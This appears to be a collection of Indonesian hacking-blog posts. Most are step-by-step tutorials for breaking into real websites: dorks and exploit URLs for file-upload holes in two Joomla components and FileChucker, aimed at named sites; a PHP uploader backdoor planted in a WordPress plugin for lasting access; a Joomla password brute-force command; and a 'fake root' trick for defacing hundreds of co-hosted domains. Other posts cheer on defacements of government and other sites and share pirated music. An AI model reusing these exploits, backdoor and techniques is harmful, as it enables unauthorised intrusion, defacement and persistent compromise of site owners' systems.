Exploit Joomla Component com_aclassif shell upload Vulnerability

Ini exploit lama sih. tapi baru nemu tadi di grup. Yaudah sekalian share di blog. Mungkin berguna buat newbie seperti saya . =)).

Oke, langsung saja.

Bahan :

1. backdoor shell, file .html / .txt

2. dork : inurl:"index.php?option=com_aclassif"

3. Exploit : index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

Langsung saja kita cari target di google dengan dork diatas.

Sebagai contoh, saya dapet target http://www.stabledock.com/

masukkan exploitnya menjadi : http://www.stabledock.com/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

Tinggal isi data datanya. Boleh ngasal kok. Terakhir, upload filenya di attachment .

NB : beberapa situs memungkinkan kita untuk upload file .php dan .html , namun ada juga yang hanya bisa upload .txt seperti situs diatas.

Jika sudah, tinggal klik link yang ada di keterangan seperti gambar diatas.

http://www.stabledock.com/components/com_aclassif/photos/mtmd23.txt

Sekian tutorial kali ini. Semoga bermanfaat.

Terlalu Sombong, Website Bareskrim Polri Diretas

Kejadiannya sekitar setengah jam yang lalu. Waktu saya masih di sekolah. Sampai dirumah, langsung share di blog. =)) . Ya, web Bareskrim Polri (http://bareskrim.polri.go.id/) yang dianggap tidak mungkin dibobol hacker, ternyata tembus. Dari berita yang pernah dipublish inilah.com, Kabareskrim dengan congkaknya menyebut bahwa hacker tidak mungkin menyerang situs bareskrim. "INILAH.COM, Jakarta - Kepala Badan Reserse Kriminal (Kabareskrim) Mabes Polri Komjen Pol Sutarman mengklaim Bareskrim Polri tidak gentar kepada para hacker (peretas) karena pihaknya percaya diri telah memiliki sistem keamanan yang kuat."

Tapi yah, kesempurnaan hanya milik Allah pak =)) . Jangan terlalu sombong. There is no perfect system. Lagipula, tidak ada "rumah" yang tidak ber"pintu" .

hacked

Defacer dengan nick "Pra5astea'" tersebut meninggalkan pesan berikut :



"LIHATLAH MERAH PUTIH INI, BERTAHTAKAN GARUDA YANG SEMPURNA"



"MENGARTIKAN BERANI, SUCI HATI DAN JIWA"



"MELAMBANGKAN BESAAAARRRR, GAGAH, DAN PERKASA"



"YA !!! INILAH BENDERA DAN LAMBANG NEGARAKU YANG INDAH NAN DIAGUNGKAN"



"TAPI KINI DIA SEDANG MENANGIS, MEMBAYANGKAN KAPAN "BERAKHIRNYA" KEBOBROKAN INI"



"DEMI TUHAN, DOA(NYA) YANG SELALU BERGEMA DEMI UMAT MANUSIA DI INDONESIA"



"HENTIKANLAH WAHAI TUAN, MUSNAHKAN KETIDAKSEIMBANGAN INI, HILANGKANLAH KEBIASAAN-KEBIASAAN YANG AKAN MEMBUAT KERUGIAN, SIRNAKAN :'("



"BERPIHAKLAH PADA RAKYAT DAN NEGARA, DEMI IBU PERTIWI TERCINTA, KEMBALI KITA TERBANGKAN BERSAMA"



Untuk Mirror nya, silahkan lihat di : Zone-H Mirror





There is no perfect system :)

Exploit Joomla Component com_smartformer Shell Upload Vulnerability

Sebenarnya ini Exploit lama sih. Tapi ternyata amsih ada web yang vuln dengan cara ini. jadi tidak ada salahnya saya juga ikut share. =))

Oke, langsung saja dimulai .

Bahan-bahan :

- shell php, script html

- dork : inurl:"index.php?option=com_smartformer" <--- kalo pengen dapet hasil lebih, kembangkan sendiri dorknya :)

Langsung saja kita berselancar di google mencari target. Harus sabar. tidak semua situs vuln dengan exploit ini.

lalu pilih salah satu situs.

maka kalian akan menemukan form seperti dibawah ini :

Langsung saja isi datanya. Lalu submit masukkan shellnya di "pilih berkas" . Terserah mau langsung script html apa backdoor .php .

Jika sudah, shell akan terletak di http://target.com/components/com_smartformer/files/namashell.php

Jika hanya upload html, ya tinggal lihat hasilnya :

Sekian tutorial kali ini, jadikan sebagai pembelajaran saja =))



./Akicha

Cyber War Indonesian Hacker vs Bangladesh Grey Hat Hacker

Saya sendiri awalnya tidak tahu penyebab dari perang dunia maya ini. Tapi setelah ditelusuri, BDGH memfitnah Indonesia dengan menyebut Indonesia sebagai pendukung Israel. Pesan yang disampaikan oleh salah satu admin BDGH adalah : Stop supporing Israel or else we will make you life hell...Be Human..Stop supporting Israel....

� BD GREY HAT HACKERS

Ini jelas fitnah karena jelas-jelas kita juga berpartisipasi dalam OpIsrael.

Telah diupayakan perundingan namun sepertinya mereka menolak damai. Bahkan tidak tanggung tanggung, puluhan situs go.id tumbang dalam sehari.

Ini jelas tidak bisa dibiarkan. Para aktivis Underground Indonesia (saya tidak mau menyebut hacker) pun bahu membahu untuk melancarkan serangan balasan ke situs Bangladesh.

hasilnya, setidaknya sampai saat ini 450+ situs Bangladesh berhasil diperawani =))



FVCK BD GAY HAT U R LAMER



Sekian dan semoga war ini segera berakhir. Mengingat kita juga sama-sama negara muslim.



./Akicha

Cara Mudah Upload Shell Via Wordpress Plugins

Kali ini saya akan share tutorial mudah untuk mengupload backdoor lewat pligins wordpress. Biasanya, kita lebih suka mengupload shell lewat edit theme. Namun kadang backdoor juga cepat hilang jika webmasternya segera menginstall ulang tema. Hal ini yang kadang tidak dilakukan di plugins. Sehingga backdoor kita tetap awet. =))

Oke, pertama, saya sumsikan sobat sudah amsuk ke dashboard WPnya. Terserah mau pake teknik apa. :)

lalu klik Plugins

Atau untuk lebih cepat, klik www.site.com/wp-admin/plugin-editor.php

Lalu pilih salah satu plugins yang akan diedit.

Setelah itu, masukkan script uploader berikut :


><br /><br /><title>Nabilaholic Uploader</title><br /><br /><?php<br />echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><br /><br /><br /> <br /><br /><br /><br /><br /><br />';<br /><br />echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form><br />';<br /><br />if( $_POST['_upl'] == "Upload" ) {<br /><br />if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded by Nabilaholic</b><br /><br /><br /><br />'; }<br /><br />else { echo '<b>jancok ! Upload gagal !</b><br /><br /><br /><br />'; }<br /><br />}<br /><br />?><br /><br /></html>


Untuk lebih jelasnya, lihat SS :

lalu, update file.

Sekarang cara mengaksesnya adalah :

www.situs.com/wp-content/plugins/namapugins/namaplugis.php



Karena saya tadi mengedit plugins wp-cumulus , maka menjadi :

http://pascalmore.me/wp-content/plugins/wp-cumulus/wp-cumulus.php

Sip, ada uploader disana. Sekarang kiat upload shell kita =))

Letak shell ada di /wp-content/plugins/namaplugins/namashell.php

Sekarang terserah mau diapain. mau dideface silahkan. Mau diobrak abrik silahkan. :v



Sekian tutorial kali ini, semoga bermanfaat =))



Refrensi

Download Lagu JKT48 - JKT Shanjou | Clean Version

Kali ini saya akan share lagu JKT Shanjou yang clean version. memang banyak sih bertebaran link download JKT Shanjou di google. tapi hampir 20x download, ngetroll semua. isinya chant semua. Untung ketemu juga yang Clean Version. Makanya langsung saya share di blog . =)) .

Oke, kali aja ada yang belum tau liriknya :

Lirik Lagu JKT48 - JKT Shanjou



Hidupku tuk Bisa terus berdiri

Mempertahankan sahabat

Melihat mimpi

Sepertinya

Akan terlihat



Melakukan apa saja

Tak pernah aku apapun tertiup angin

Ingin menjadi pasir

Tidak melupakan air mata yang mengalir

Hari tak bersemangat



Entah darimana itu balasan

Yang seakan terus berfikir

Suaranya pun juga terdengar teriakan

Yang mengetuk

Mengetuk pintu hati



We Are JKT,

Semangat maakusu

Yang dahulu pernah hilang

Oh! Emotion kuingatlah



Ayo pergi

We Are JKT,

Semangat maakusu

Berlari di sekujur tubuh

Aliran darah panas ini

Ayolah dobrak masa depan



Waktu ku kecil

Daripada di kejar,

Akulah yang mengejar

Entah sejak kapan

Ku berhenti berlari

Hanya berjalan saja



Apabila hal baik

Tak ada satu pun,

Untuk melihat ke bawah

Yang sudah lelah untuk mempercayainya



Saat ini berdiri

Bagaikan ingin memandang sesuatu

Merasakan detak jantung

Mencari siapa yang

Kesulitan



Tiba untuk berjuang

We are JKT

Kesatuan Fourty Eight

Ayo kembali pasang

Mimpi yang dahulu pernah hilang!



Yosshaaa

We are JKT

Kesatuan Fourty Eight

Yang berkilauan

Bukanlah keringat yang jatuh ke kaki

Ada jiwa yang membara



Ayo terus berlari!

We are JKT

Semangat maakusu

Yang dahulu pernah hilang

Oh! Emotion kuingatlah



Ayo pergi!

We are JKT

Semangat maakusu

Berlari di sekujur tubuh

Aliran darah panas ini

Ayolah dobrak masa depan!



Ini Link Downloadnya :

Download JKT48 - JKT Shanjou Clean Version



Sekian dan semoga bermanfaat



./Akicha | We Love JKT48

Brute Force Joomla Dengan Python

Kali ini saya akan share tutorial ngan metode bruteforce. Tapi kali ini yang digunakan adalah Phyton. Tutorial yang saya share disini saya test emnggunakan Windows. Mungkin kalau anda pemakai backtrack tidak akan serumit ini.

Oke, pertama download python disini : Python

Lalu download joomla.py di sini : Download

lalu wordlistnya disini : Download 1 | Download 2





Pertama, kita harus buka CMD

Start - Run - CMD - Enter



Karena saya meletakkan joomla.py di C:\brute\brute, jadi harus cd\ �klik enter� .

Lalu cd brute\brute �klik enter� .

Lalu ketik joomla.py .

Lalu masukan Command

joomla.py -h http://namaweb.com/administrator/ -u admin -P wordlist.txt

Bruteforce membutuhkan kesabaran. Tunggu saja sampai proses finding password selesai. Dan lihat, kita mendapatkan passwordnya :

Sekarang, coba login dengan password yang didapat =))

Last Step

Gotcha !!Sudah masuk. Sekarang terserah ada mau diapain .

Sekian dan semoga bermanfaat =))



Refrensi

Front Pembela Islam Website Hacked by R4ym0nd

Pulang sekolah, dapat kabar kalo situs FPI berhasil di deface. Pas saya lihat pertama kali, tertulis R4ym0nd .  patch your site, or I'll be back! �2013 R4ym0nd. Namun hanya berselang satu menit, tampilan berubah Beruntung saya berhasil menambil screenshoot kedua tampilan tersebut :) .

Ini tampilan pertama yang saya lihat :

Ini tampilan kedua. Terjadi sekitar satu menit setelah tampilan pertama, saat browser direload :

Sekian dan terimakasih :)



Update :

Menurut sumber dari detik.com, jam 11.00 WIB, situs FPI sudah dideface lebih dulu oleh surabayag3tar

Berikut SSnya :

www.madura-cyber.org

Cara Mengambil Script Deface Dari Zone-H Mirror

Mungkin trik seperti ini sudah tidak berguna bagi yang jago dalam membuat script deface sendiri atau sudah berpengalaman. Namun tidak ada salahnya saya share. Barangkali ada yang belum tau. Cara mengambil source code script dari Zone-H cukup mudah.

Step pertama, sobat tentukan link zone-h mirror yang akan diambil scriptnya :)

Sebagai contoh

http://www.zone-h.org/mirror/id/20340978



Kalo scriptnya tidak diprotect klik kanan, lagsung saja klik kanan di defaced page, view iframe.

Tapi kalau scriptnya diberi anti klik kanan, kita harus memasukkannya secara manual.

http://zonehmirrors.org/defaced/(tahun)/(bulan)/(tanggal)/(url deface)

Coba lihat, disitu pasti tertulis :

Mirror saved on: 2013-07-22 23:53:18

Domain: http://baofulu.com/crot.html



Sekarang coba lihat lewat zonehmirrors.org seperti format diatas. Jadinya :

http://zonehmirrors.org/defaced/2013/07/22/baofulu.com/crot.html

Sip. Kita melihat fullpage nya :)

Tinggal arahin pointer ke address bar, klik CTRL + U .

Done. Sekian dan terimakasih.

Semoga bermanfaat :)

Share Green Code Theme Portal by E1nzte1N

Langsung saja deh. Bagi yang punya portal pribadi dan belum punya template, ini perlu dicoba. Bukan buatan saya sih. Saya cuma bantu share. Ini buatan bang E1nzte1N, anak HN. Tapi tadi ada yang minta, sekalian aja saya share di blog. Biar ada update postingan.



Nih tampilannya :

E1nzte1N Portal

Nih Live Demonya : Click here
Nih Link downloadnya : Click Here

Nah, tulisan yg berwarna hijau diatas, E1nzte1N bisa anda rubah sendiri. Nih geneartornya : Click Here



Sekian dan semoga bermanfaat. Happy blogging :)

Silahkan diedit-edit sendiri. Tapi jangan ahpus creditnya :)

Thanks to E1nzte1N

Tutorial Deface Dengan Fake Root | User Enumeration

Sebenarnya saya sendiri bingung mau diaksih judul apa. Saya dapet dari threadnya bang Rebels di Forum Devilzc0de. Aslinya User Enumeration tapi tidak serumit itu. :v . Yasudah, langsung saja prakteknya.

Berikut bahan-bahan yang diperlukan :

Reverse IP

Shell yang sudah tertanam di web korban.



Exploit :

http://www.example.com/~root



Cek web yang sudah tertanam shell dengan exploit diatas.

Contoh :

http://mysled.net/~root maka hasilnya forbidden.

Langkah selanjutnya, upload script deface di public_html .

ex : http://mysled.net/crot.html



Oke, sekarang saatnya melihat domain ayng berada satu server dengan http://mysled.net/.

Sobat bisa menggunakan web Reverse IP diatas atau jika shell sobat sudah dilengkapi dengan tools Local Domain Viewer(tools 1n73ction sudah ada), tinggan klik menu DOMAIN.

Wow, ada 874 domain.

Nah, cara melihat hasil fake root nya exploit begini :

http://www.example.com /~dirdibelakang public_html / scriptmu.html



Lihat dir dibelakang public-html

contoh , /home/mysledne/public_html/ .

Karena saya tadi mengupload script crot.html di public_html,

coba cek salahsatu domain yang satu server dengan exploit diatas.

Contoh domain yang satu server dengan http://mysled.net/ adalah http://80s-clothing.com

Cek, http://80s-clothing.com/~mysledne/crot.html

Defaced . :)

Hal itu akan terjadi di 800 domain lainnya tanpa ada susah susah melakukan mass deface server. Cukup tambahkan ~mysledne/crot.html

See More :



allaboutalberta.com/~mysledne/crot.html

http://aerosealcalgary.com/~mysledne/crot.html

http://aeroanalys.ca/~mysledne/crot.html

http://advicecounselling.com/~mysledne/crot.html

http://adultlifedirectory.com/~mysledne/crot.html

http://70s-fashion.net/~mysledne/crot.html

http://50s-fashion.com/~mysledne/crot.html

http://livre-audio.ca/~mysledne/crot.html

http://60s-fashion.net/~mysledne/crot.html

http://accountantscalgary.biz/~mysledne/crot.html

http://allaboutcalgary.com/~mysledne/crot.html



Dan amsih banyak lagi. Ada 800 domain lebih. :)



Sekian dan semoga bermanfaat.



./Nabilaholic404



Yang mau copas, sertakan sumber.

www.madura-cyber.org



Refrensi :

devilzc0de

Coboy Junior Indonesia Concert Hacked by Katonz | Surabaya Blackhat

Sore ini dapet kabar dari temen, web Coboy Junior Indonesia Concert yang beralamat di http://www.cjr-generation.com/ kena deface.

Setelah saya akses ternyata sudah normal. :3 . Untung masih ada mirrornya.

Di web tersebut ada pesan Jadilah generasi muda yg baik dan menjadi panutan, bukan yg angkuh dan senonoh.

Agak unik juga, backsound yang diapsang adalah lagu Aitakatta dari JKT48. :v

Nih kalau yang mau lihat mirrornya :

http://www.cjr-generation.com hacked. notified by Katon



Masih kecil, jangan songong ya nak. :)

Twitter Band MCR Di Hack

Lagi, akun Twitter selebriti menjadi sasaran empuk pembajak atau hacker. Giliran grup band rock alternative asal Amerika Serikat (AS),My Chemical Romance (@MCRofficial) ikut-ikutan diretas, padahal terhitung sejak Maret lalu sudah pensiun dari belantika musik dunia.





Hacker mengubah deskripsi profil akun menjadi �Segera�,�. Sontak perubahan profil ini membuat lebih dari 600 ribu followers-nya heboh dan meyakini bahwa mereka akan mempersiapkan kembali memanjakan telinga penggemarnya.



Tak hanya itu, hacker juga men-tweet: �Anda hanya perlu mendengar musik ketika suasana hati Anda mulai berantakan�. Demikian dikutip dari Softpedia, Selasa (16/7/2013).



Menyadari akan aksi pembajakan akun band yang pernah digawanginya, Gerard Way, mantan vokalis My Chemical Romance langsung mengklarifikasi bahwa akun Twitter tersebut telah diretas.



�Jadi @MCRofficial telah diretas. Teman-teman di Warner Bros Record (WBR) akan mengurus hal itu. Maaf kalau itu mengacaukan kalian di luar sana,� tweet Way.



�Meski pelaku tidak mengatakan hal-hal berarti, tetapi ia mengubah foto band. Tapi, aku mengerti beberapa di antara kalian pasti ada yang merasa kecewa dan terganggu,� tambahnya. Saat ini, akun Twitter My Chemical Romance sedang dipulihkan.

Indonesian Cyber Army | IDCA Forum Hacked by xCrotZ

Bangun tidur, pas mau sahur dapet kabar yang agak mengejutkan. Forum IDCA untuk yang kedua kalinya kena deface. Sebelumnya oleh Sandy-x207, founder 207 Cyber Security. Dan kali ini lagi-lagi salah satu forum underground di Indonesia itu kena deface. Kali ini oleh xCrotZ. Anak dari Hacker Newbie Community.



Forum yang beralamat di http://indocyberarmy.org/forum/ berubah dengan background hitam, gambar tengkorak khas HN dan tulisan Hi All, Are You Hacker ?

Beberapa nama terpampang : xh4x0r | Alecs | TeguhMicro | R3DD3VIL | Om-Jin | Vergos303 .

Tak lupa dibawah tertulis email yang bisa dicontact : xcrotz@hacker-newbie.org

IDCA Hacked by xCrotZ

Saat anda mengaksesnya sekarang, mungkin tampilannya sudah berubah. Terakhir saya mengaksesnya tampilan Under Construction.

Tapi anda bisa melihat mirror defacenya di sini :

Hack-Mirror



Namun saat ini forum akan pindah ke http://indonesiancyberarmy.or.id

Coming Soon :)

Exploit FileChucker File Upload Vulnerability

Kali ini saya akan share exploit yang mungkin berguna untuk para newbie seperti saya. Ya, Exploit FileChucker File Upload Vulnerability .

Oke, langsung saja ya. :)

Bahan :

Dork :

inurl:/cgi-bin/filechucker.cgi

intext:Toptown File Upload

inurl:/cgi-bin/filechucker.pl

intext:File Upload by Encodable





File deface berformat txt, html. Tidak bisa php !

Mulai berselancar di google dan mencari target yang vuln.

Kali ini saya pilih

http://toptown.co.uk/cgi-bin/filechucker.cgi

Isi form dan mulai upload file. Lihat SS :

Jika sudah, tinggal lihat hasil nya di [localhost]/upload/files/[namafile]

Ex :

http://toptown.co.uk/upload/files/el.html

Done

Refrensi

Exploit FileChucker File Upload Vulnerability

Assalamualaikum...

Menjelang datangnya bulan Ramadhan, sebelumnya saya selaku Admin mohon maaf jika ada salah dan khilaf yah,, mungkin emang saya sengaja maupun tidak :)

Oke, saya lanjut berbagi lagi :) disimak aja ;) yah bisa dah sekedar nambahin unique deface di Arsip :D

Dork :

inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload

inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable

Ayo mulai :) Silahkan sobat mencari target di google dengan menggunakan Dork diatas..

Disini saya sudah menemukan targetnya, yaitu : http://toptown.co.uk/cgi-bin/filechucker.cgi

Kemudian silahkan sobat isi yang perlu diisi filednya :) dan browse jg file depesan sobat :)

Setelah itu klik Begin Upload.. Nah, tunggu aja hasilnya :)
Note: File yang bisa diupload yaitu .htm, .html, .txt, .jpg, .gif

Dan langsung buka file depesan yg sudah diupload tadi : http://site.com/upload/files/file_mu

Sekian tutorialnya yah,, maaf kalo masih acak2an :) yang penting bisa bermanfaat :)
Wassalam,,

Demo :  
http://exhibitfoundryfiles.com/upload/files/idca.html
http://ableprintingco.com/upload/files/idca.html


http://toptown.co.uk/upload/files/idca.html

Content Creator : Onix AQua

Download JKT48 Yuuhi Wo Miteiruka | Full Album

Kali ini saya akan share single terbaru JKT48 Yuuhi Wo Miteiruka. Ya, single terbaru ini saya yakin adalah yang saat ini banyak dicari. Namun mungkin diantara sobat ada yang belum mampu untuk membeli CD Originalnya. Apalagi yang uangnya sudah habis untuk daftar ulang (bagi anak sekolah). Keren deh, pacar ane Shinta Naomi masuk senbatsu.

Udah, gak perlu basa-basi. Langsung saja.

Sharenya langsung satu album aja. Di dalamnya ada empat lagu.

Yaitu :



Yuuhi wo Miteiru ka-Apakah Kau Melihat Matahari senja

Nagai Hikari-Cahaya Yang Panjang

Viva Hurricane!

1!2!3!4! Yoroshiku



Tapi dipack jadi satu dalam bentuk RAR



Download Full Album Yuuhi Wo Miteiruka



Thanks buat yang upload.

We Love JKT48